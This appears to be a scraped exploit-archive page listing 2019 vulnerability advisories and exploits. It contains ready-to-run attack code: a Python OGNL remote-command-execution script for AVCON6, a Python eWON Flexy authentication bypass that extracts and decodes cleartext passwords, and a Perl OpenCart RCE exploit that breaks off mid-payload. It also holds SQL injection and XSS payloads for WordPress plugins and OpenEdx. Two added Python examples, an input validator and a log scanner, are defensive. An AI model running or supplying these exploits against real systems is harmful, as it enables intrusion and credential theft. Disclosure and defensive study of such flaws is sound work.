
CA Common Services Distributed Intelligence Architecture (DIA) Code Execution


CA Technologies, A Broadcom Company, is alerting customers to a potential risk with CA Common Services in the Distributed Intelligence Architecture (DIA) component. A vulnerability exists, CVE-2019-13656, that can allow a remote attacker to execute arbitrary code. CA published solutions to address the vulnerabilities and recommends that all affected customers implement these solutions immediately.


MD5 | c76715457f48e68974e479f4b7e116f3


CA20190904-01: Security Notice for CA Common Services Distributed
Intelligence Architecture (DIA)

Issued: September 4th, 2019
Last Updated: September 4th, 2019

CA Technologies, A Broadcom Company, is alerting customers to a
potential risk with CA Common Services in the Distributed
Intelligence Architecture (DIA) component. A vulnerability exists,
CVE-2019-13656, that can allow a remote attacker to execute arbitrary
code. CA published solutions to address the vulnerabilities and
recommends that all affected customers implement these solutions
immediately.

Risk Rating

High

Platform(s)

All supported platforms

Affected Products

CA Common Components DIA

CA Technologies products that bundle this software include:
CA Client Automation 14 and later versions
CA Workload Automation AE 11.3.5 and 11.3.6

How to determine if the installation is affected

Customers should review the Solution section to determine whether the
fix is present.

CA Workload Automation Autosys:

The Distributed Intelligence Architecture (DIA) that installs with
the 11.3.5 and 11.3.6 C3 DVD is vulnerable.

Solution

CA published the following solutions to address the vulnerabilities.
Fixes are available on the CA support site.

CA Client Automation:

Windows
Solution: SO09605

Linux
Solution: SO09633

CA Workload Automation Autosys:

The following are the fixes published by the Workload Automation
Autosys Product team for the vulnerability CVE-2019-13656 reported
against Distributed Intelligence Architecture (DIA) shipped with C3
DVD.

Windows
Solution: SO09111

Linux
Solution: SO09057

HP-UX
Solution: SO09086

Solaris
Solution: SO09084

AIX
Solution: SO09085

Patch Validation

The script applypatch.bat for Windows and applypatch.sh for Linux and
Unix platforms when run should not produce any errors in its console
output. The script starts the NSM services at the end of the patch
application process. A successful patch application is manifested in
the form of all services coming up successfully.

References

CVE-2019-13656 - CA Common Services remote code execution

Acknowledgement

CVE-2019-13656 - Fredrik Ravne, Oslo Boers

Change History

Version 1.0: Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications on the support site.

Customers who require additional information about this notice may
contact CA Technologies Support at https://casupport.broadcom.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at ca.psirt <AT> broadcom.com

Security Notices, PGP key, and disclosure policy and guidance
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Kevin Kotas
CA Product Security Incident Response Team

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.





WordPress Photo Gallery 1.5.34 SQL Injection


WordPress Photo Gallery plugin version 1.5.34 suffers from a remote SQL injection vulnerability.


MD5 | fcbebd862edffad8159f0e6a677a68d2

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
# CVE : 2019-16119

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from them.

# POC
In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC,

1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&

2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&


# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119

WordPress Photo Gallery 1.5.34 Cross Site Scripting


WordPress Photo Gallery plugin version 1.5.34 suffers from multiple cross site scripting vulnerabilities.


MD5 | c54aae5bfb68ea0b6b614b43aee42438

# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# CVE : 2019-16117

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.


# POC

1. In Add Gallery/Images tab
2. Edit current image gallery
3. In Alt/Title or Description text area add XSS payload e.g;
<script>alert(1);</script>

4. Click Save and preview.
5. It will show pop-up confirming existence of XSS vulnerability

# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117


# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting
# inurl:"\wp-content\plugins\photo-gallery"
# Date: 09-10-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://10web.io/
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
# Version: Up to v1.5.34
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
# CVE : 2019-16118

# Software description:
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.


# Technical Details & Impact:
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.


# POC

1. Go to options tab select watermark tab
2. Select text as watermark type
3. Add watermark text as XSS payload e.g;
"'><img src=a onerror='alert(2);'
4. Click Save.
5. It will show pop-up confirming existence of XSS vulnerability

# Timeline
09-01-2019 - Vulnerability Reported
09-03-2019 - Vendor responded
09-04-2019 - New version released (1.5.35)
09-10-2019 - Full Disclosure

# References:
https://wordpress.org/plugins/photo-gallery/#developers
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Options.php?old=2142624&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FOptions.php
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/js/bwg.js?old=2135029&old_path=photo-gallery%2Ftrunk%2Fjs%2Fbwg.js
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16118


WordPress Checklist 1.1.5 Cross Site Scripting


WordPress Checklist plugin version 1.1.5 suffers from a cross site scripting vulnerability.


MD5 | 34e3a400ea9bcb5738b5fb43d3342860

Class: Input Validation Error
Remote: Yes
Credit: Ricardo Sanchez
Vulnerable: Checklist 1.1.5

Checklist is prone to a reflected cross-site scripting vulnerability
because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To exploit this issue, follow these steps:
The XSS is reflected because the URL value is not filtered correctly:

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert(%22R1XS4.COM%22)%3C/script%3E%3C/path%3E

AVCON6 Systems Management Platform Remote Root


AVCON6 Systems Management Platform suffers from a remote root command execution vulnerability.


MD5 | 30cc08a1ee45edf5711ca6ba498148e6

# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
# Date: 10/09/2018
# Exploit Author: Nassim Asrir
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N\A
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
# Thanks to: Otmane Aarab
# Example below:
# python ./rce.py http://server:8080/ id
# Testing Target: http://server:8080/
# uid=0(root) gid=0(root)
# Vendor: http://www.epross.com/
# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing
# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
# I am not responsible for any wrong use.
######################################################################################################

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = 'login.action?redirect:'
    payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
    payload += 'start(),%23b%3d%23a.getInputStream(),'
    payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
    payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
    payload += '.read(%23e),%23matt%3d%23context.'
    payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
    payload += '%23matt.getWriter().println(%23e),%23matt.'
    payload += 'getWriter().flush(),%23matt.getWriter()'
    payload += '.close()}'


    try:
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
        request = urllib2.Request(url+payload, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py http://target/ id")
    else:
        print('[*] Avcon6-Preauh-Remote Command Execution')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] Executed Command: %s\n" % cmd)
        print("[*] Target: %s\n" % url)
        exploit(url, cmd)

WordPress SlickQuiz 1.3.7.1 Cross Site Scripting


WordPress SlickQuiz plugin version 1.3.7.1 suffers from a persistent cross site scripting vulnerability.


MD5 | 2b3be87fd8c14d5a318cff3683426794

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: SlickQuiz
Vendor URL: https://wordpress.org/plugins/slickquiz/
Type: Cross-Site Scripting [CWE-79]
Date found: 2019-05-30
Date published: 2019-09-10
CVSSv3 Score: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
CVE: CVE-2019-12517


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===============
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The "save_quiz_score" functionality available to unauthenticated users via the
Wordpress "/wp-admin/admin-ajax.php" endpoint allows unauthenticated users to
submit quiz solutions/answers. If the configuration option "Save user scores"
is enabled (disabled by default), the response is stored in the database and
later shown in the Wordpress backend for all users with at least Subscriber
rights.

However, since the plugin does not properly validate and sanitize the quiz
response, a malicious XSS payload in either the name, the email or the score
parameter like:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0)
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
DNT: 1
Connection: close

action=save_quiz_score&json={"name":"Na<script>alert(document.domain)</script>
me","email":"info@local<script>alert(document.domain)</script>host",
"score":"<script>alert(document.domain)</script>","quiz_id":1}

is executed directly within the backend at "/wp-admin/admin.php?page=slickquiz"
across all users with the privileges of at least subscriber and up to admin.


6. RISK
=======
To successfully exploit this vulnerability an authenticated user must be tricked
into visiting the SlickQuiz administrative backend on the affected Wordpress
installation.

The vulnerability can be used to permanently embed arbitrary script code into the
administrative Wordpress backend, which offers a wide range of possible
attacks such as redirecting the user to a malicious page, spoofing content on the
page or attacking the browser and its plugins.


7. SOLUTION
===========
None (Remove the plugin)


8. REPORT TIMELINE
==================
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12517
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor.
2019-09-10: Public disclosure.


9. REFERENCES
=============
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
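
The missing control described in section 5 above, shown as an added example (not part of the advisory and not the plugin's code, which is PHP): validate the "save_quiz_score" JSON fields on input and HTML-escape them when the backend table is rendered. The field rules (name length, score format) and all function names are assumptions made for illustration; the sample bodies are constructed.

```python
import html
import json
import re

MAX_NAME = 64  # assumed limit, not taken from the plugin
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+")
# Assumed score format: "7" or "7 / 10". Anything else is refused.
SCORE_RE = re.compile(r"[0-9]{1,4}(?:\s*/\s*[0-9]{1,4})?")

# Constructed request bodies modelled on the advisory's POST parameter "json".
ADVISORY_STYLE_BODY = (
    '{"name":"Na<script>alert(document.domain)</script>me",'
    '"email":"info@local<script>alert(document.domain)</script>host",'
    '"score":"<script>alert(document.domain)</script>","quiz_id":1}'
)
MARKUP_IN_NAME_BODY = (
    '{"name":"Na<script>alert(document.domain)</script>me",'
    '"email":"info@localhost","score":"7 / 10","quiz_id":1}'
)


def validate_submission(raw_json):
    """Return (record, errors). record is None when any field is refused."""
    try:
        data = json.loads(raw_json)
    except ValueError:
        return None, ["body is not valid JSON"]
    if not isinstance(data, dict):
        return None, ["top-level value must be an object"]

    errors = []
    name = data.get("name")
    # Free text: only type and length are checked here, escaping happens on output.
    if not isinstance(name, str) or not 0 < len(name) <= MAX_NAME:
        errors.append("name")
    email = data.get("email")
    if not isinstance(email, str) or not EMAIL_RE.fullmatch(email):
        errors.append("email")
    score = data.get("score")
    if not isinstance(score, str) or not SCORE_RE.fullmatch(score):
        errors.append("score")
    quiz_id = data.get("quiz_id")
    if isinstance(quiz_id, bool) or not isinstance(quiz_id, int) or quiz_id < 1:
        errors.append("quiz_id")

    if errors:
        return None, errors
    return {"name": name, "email": email, "score": score, "quiz_id": quiz_id}, []


def render_row(record):
    """Build the backend table row; every stored value is escaped at output time."""
    cells = (record["name"], record["email"], record["score"])
    return "<tr>" + "".join(
        "<td>%s</td>" % html.escape(cell, quote=True) for cell in cells
    ) + "</tr>"


if __name__ == "__main__":
    for body in (ADVISORY_STYLE_BODY, MARKUP_IN_NAME_BODY):
        record, errors = validate_submission(body)
        if record is None:
            print("refused, bad fields:", errors)
        else:
            print("stored, rendered as:", render_row(record))
```

Input validation alone does not cover the free-text name field, which is why the row renderer escapes every cell regardless of what validation accepted.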

WordPress SlickQuiz 1.3.7.1 SQL Injection


WordPress SlickQuiz plugin version 1.3.7.1 suffers from a remote SQL injection vulnerability.


MD5 | acde8b3afeb02ebd1f0a2649b6924ad2

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: SlickQuiz
Vendor URL: https://wordpress.org/plugins/slickquiz/
Type: SQL Injection [CWE-74]
Date found: 2019-05-30
Date published: 2019-09-10
CVSSv3 Score: 8.1 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
CVE: CVE-2019-12516


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
SlickQuiz for Wordpress 1.3.7.1 (latest)


4. INTRODUCTION
===============
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It
uses the SlickQuiz jQuery plugin.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The SlickQuiz Wordpress plugin is vulnerable to multiple authenticated SQL
Injections whenever the "id" parameter is involved. It is not even required to
have any quiz created, just the pure presence of the plugin makes the
installation vulnerable.

Since all access levels from Subscriber (the lowest possible rights) to Admin
basically have access to the plugin, it is possible to escalate privileges quite easily.

To name just a few vulnerable endpoints:

/wp-admin/admin.php?page=slickquiz-scores&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-edit&id=(select*from(select(sleep(5)))a)
/wp-admin/admin.php?page=slickquiz-preview&id=(select*from(select(sleep(5)))a)


6. RISK
=======
The vulnerability can be used by an authenticated attacker (lowest possible
rights of Subscriber are sufficient) to read sensitive contents from the backend
database and therefore compromise all kinds of information, which is stored in
the database. This could be sensitive authentication information like passwords
or customer and employee information like email addresses and could also be used
to escalate privileges to Admin which in return leads to RCE on the Wordpress
installation via the plugin functionality.


7. SOLUTION
===========
None (Remove the plugin)


8. REPORT TIMELINE
==================
2019-05-30: Discovery of the vulnerability during H1-4420
2019-06-01: CVE requested from MITRE
2019-06-02: MITRE assigns CVE-2019-12516
2019-06-10: Contacted vendor using their publicly listed email address
2019-06-19: Contacted vendor using their publicly listed email address
2019-06-22: Contacted vendor using their publicly listed email address
2019-08-28: No response from vendor
2019-09-10: Public disclosure.


9. REFERENCES
=============
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/
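
Detection logic for the two SQL injection advisories on this page (Photo Gallery "album_id" and SlickQuiz "id"), as an added example that is not part of either advisory: both parameters should only ever carry an integer, so any other value on those handlers in a web access log is worth an alert. The combined log format, the function names and the sample log lines (constructed, documentation IP ranges) are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Handlers named in the advisories: (selector key, selector value pattern,
# parameter that is expected to be a plain integer).
WATCHED = [
    ("action", re.compile(r"albumsgalleries_bwg"), "album_id"),
    ("page", re.compile(r"slickquiz-(?:scores|edit|preview)"), "id"),
]
ADMIN_PATHS = ("/wp-admin/admin-ajax.php", "/wp-admin/admin.php")
# Assumption: request line is quoted, as in the common/combined log formats.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[0-9.]+"')
INTEGER_RE = re.compile(r"[0-9]{1,10}")

# Constructed sample log lines.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Sep/2019:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0&width=785&height=550&bwg_nonce=0000000000 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Sep/2019:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=0000000000 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Sep/2019:10:01:00 +0000] "GET /wp-admin/admin.php?page=slickquiz-scores&id=3 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Sep/2019:10:01:30 +0000] "GET /wp-admin/admin.php?page=slickquiz-edit&id=(select*from(select(sleep(5)))a) HTTP/1.1" 200 2048',
    '192.0.2.11 - - [10/Sep/2019:10:02:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&id=abc HTTP/1.1" 200 1024',
]


def check_line(line):
    """Return a finding dict if a watched integer parameter is not an integer."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    try:
        url = urlsplit(match.group(1))
    except ValueError:
        return None
    if not url.path.endswith(ADMIN_PATHS):
        return None
    # parse_qs percent-decodes values, so encoded and raw payloads look alike.
    query = parse_qs(url.query, keep_blank_values=True)
    for selector, pattern, param in WATCHED:
        handlers = [v for v in query.get(selector, []) if pattern.fullmatch(v)]
        if not handlers:
            continue
        for value in query.get(param, []):
            if not INTEGER_RE.fullmatch(value):
                return {
                    "client": line.split(" ", 1)[0],
                    "handler": handlers[0],
                    "param": param,
                    "value": value,
                }
    return None


def scan(lines):
    """Check every log line and return the findings in input order."""
    findings = []
    for line in lines:
        finding = check_line(line)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("%(client)s %(handler)s %(param)s=%(value)r" % f)
```

The same integer check belongs in the request handler itself; the log scan only tells you whether someone has already been probing an unpatched install.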


OpenEdx Ironwood.1 Cross Site Scripting


OpenEdx Ironwood.1 suffers from multiple cross site scripting vulnerabilities.


MD5 | a1948634f9cbc0189206c03dba7b54de

Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting Vulnerabilities in OpenEdx
version Ironwood.1
Affected Software: OpenEdx
Affected Versions: Ironwood.1
Homepage: https://open.edx.org/
Vulnerability: Cross site Scripting
Severity: Medium
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Netsparker Advisory Reference: NS-19-014

Technical Details
--------------------

URL : http://{DOMAIN}/{PATH-OF-OPENEDX}/support/certificates?course_id=%27%2balert(‘xss’)%2b%27&query=3&user=3
Parameter Name : course_id
Parameter Type : GET
Attack Pattern : %27%2balert(‘xss’)%2b%27

URL : http://{DOMAIN}/{PATH-OF-OPENEDX}/support/certificates?course_id=3&query=3&user=%27%2balert(‘xss’)%2b%27
Parameter Name : user
Parameter Type : GET
Attack Pattern : %27%2balert(‘xss’)%2b%27

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-014-reflected-cross-site-scripting-in-openedx/


Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner


eWON Flexy 13.0 Authentication Bypass


eWON Flexy with firmware version 13.0 suffers from an authentication bypass vulnerability.


MD5 | d0b98d41fed10c41d04cae17c5d2a676

#! /usr/bin/env python
'''
# Exploit Title: eWON v13.0 Authentication Bypass
# Date: 2018-10-12
# Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
# [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
# Vendor Homepage: https://www.ewon.biz
# Version: eWon Firmware 12.2 to 13.0
# Tested on: eWon Flexy with Firmware 13.0s0

Copyright 2019 Photubias(c)

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.

File name eWON-Flewy-Pwn.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

This script will perform retrieval of clear text credentials for an eWON Flexy router
Tested on the eWON Flexy 201 with Firmware 13.0s0
Only requires a valid username (default = adm) and
this user must have the Rights 'View IO'& 'Change Configuration'

It combines two vulnerabilities: authentication bypass (fixed in 13.1s0)
and a weak password encryption, allowing cleartext password retrieval for all users (fixed in 13.3s0)
'''
username = 'adm'

import urllib2,urllib,base64,binascii,os

def decode(encpass):
    xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
    def convertPass(password):
        if (len(password)/2) > 19:
            print('Error, password can not exceed 19 characters')
            exit()
        return hexxor(password, xorString[:len(password)])
    def hexxor(a, b):
        return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
    if encpass.startswith('#_'):
        encpass = encpass.split('_')[2]
    coded = base64.b64decode(encpass)
    codedhex = binascii.hexlify(coded)[:-4]
    clearpass = binascii.unhexlify(convertPass(codedhex))
    print('Decoded password: ' + clearpass)

def getUserData(userid, strIP):
    postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
    postwsdlist = postwsdlist.replace('|1','|'+str(userid))
    postdata = {'wsdList' : postwsdlist}
    b64auth = base64.b64encode(username+':').replace('=','')
    result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
    resultarr = result.split('","')
    if len(resultarr) == 20:
        fname = str(resultarr[1])
        lname = str(resultarr[2])
        usern = str(resultarr[3])
        if len(usern) == 0:
            return True
        encpassword = resultarr[4]
        print('Decoding pass for user: '+usern+' ('+fname+''+lname+') ')
        decode(encpassword)
        print('---')
        return True
    else:
        return True

strIP = raw_input('Please enter an IP [10.0.0.53]: ')
if strIP == '': strIP = '10.0.0.53'
print('---')

for i in range(20):
    if not getUserData(i, strIP):
        print('### That\'s all folks ;-) ###')
        raw_input()
        exit(0)

raw_input('All Done')

Microsoft DirectWrite SplicePixel Invalid Read

Microsoft DirectWrite sfac_GetSbitBitmap Out-Of-Bounds Read

Opencart 2.3.0.2 Pre-Auth Remote Command Execution


Opencart version 2.3.0.2 pre-authentication remote command execution exploit.


MD5 | ecfedfe429ca0f5648010f4f340c584b

#!/usr/bin/perl -w
#
# Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# # [test@localhost opencart]$ perl opencart_rce.pl http://192.168.1.1/oc2302/
# # [
# # [ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
# # [ ==============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Authorization..
# # [ Initializing the payload
# # [ Uploading the payload
# # [ Exploiting..
# # [ Cleaning the temp payload file
# # [ ==============================================================
# # uid=48(apache) gid=48(apache) groups=48(apache)
# # [test@localhost opencart]$
# #
#
#
# https://www.owasp.org/index.php/Security_by_Design_Principles
#
#
use strict;
use JSON;
use HTTP::Request;
use HTTP::Request::Common;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
$| = 1;
my $host = shift || 'https://localhost/'; # Full path url to the store
my $user = shift || 'admin';
my $pass = shift || 'admin';
my $cmd = shift || 'id';
$cmd =~ s/\|/\;/g;
print "[
[ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
[ ==============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
[
[ Disclaimer:
[ This or previous programs are for Educational purpose
[ ONLY. Do not use it without permission. The usual
[ disclaimer applies, especially the fact that Todor Donev
[ is not liable for any damages caused by direct or
[ indirect use of the information or functionality provided
[ by these programs. The author or any Internet provider
[ bears NO responsibility for content or misuse of these
[ programs or any derivatives thereof. By using these programs
[ you accept the fact that any damage (dataloss, system crash,
[ system compromise, etc.) caused by the use of these programs
[ are not Todor Donev's responsibility.
[
[ Use them at your own risk!
[
";
print "[ e.g. perl $0 https://target/ <username> <password> <command>\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(90);
$browser->cookie_jar($jar);
$browser->agent($user_agent);
my $target = $host."admin/index.php?route=common/login";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"username=$user&password=$pass&redirect=$target");
print "[ Authorization..\n";
# $request->authorization_basic('USERNAME', 'PASSWORD');
my $content = $browser->request($request) or die "Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($content->code eq '401');
if (defined ($content->header('Location')) && ($content->header('Location') =~ m/token=(.*)/)){
my $token = $1;
my $rce_catch = $host."admin/index.php?route=extension/installer/upload";
print "[ Initializing the payload\n";
my $name;
for (0..18) { $name .= chr( int(rand(25) + 65) ); }
my $filename = $name.".ocmod.xml";
undef $name;

my $payload = '<?xml version="1.0" encoding="utf-8"?>
<modification>
<name><![CDATA['.$filename.']]></name>
<code><![CDATA['.$filename.']]></code>
